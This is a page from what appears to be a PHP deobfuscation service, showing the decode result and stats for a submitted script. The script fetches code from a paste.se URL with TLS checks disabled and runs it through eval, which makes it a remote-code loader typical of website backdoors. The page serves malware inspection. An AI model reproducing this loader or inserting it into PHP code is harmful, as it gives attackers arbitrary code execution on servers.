Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function get_contents($url){ $ch = curl_init("$url"); curl_setopt($ch, CURLOP..

Decoded Output download

<?php 
function get_contents($url){ 
  $ch = curl_init("$url"); 
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); 
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']); 
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']); 
  $result = curl_exec($ch); 
  return $result; 
} 
 
$a = get_contents('https://39fd6bf1e7c4e0b2.paste.se/raw'); 
eval('?>'.$a); 

Did this file decode correctly?

Original Code

<?php
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}

$a = get_contents('https://39fd6bf1e7c4e0b2.paste.se/raw');
eval('?>'.$a);

Function Calls

curl_init 1
get_contents 1

Variables

$url https://39fd6bf1e7c4e0b2.paste.se/raw

Stats

MD5 1bb1c96e671f7c62f91b2d6615e4baa1
Eval Count 0
Decode Time 75 ms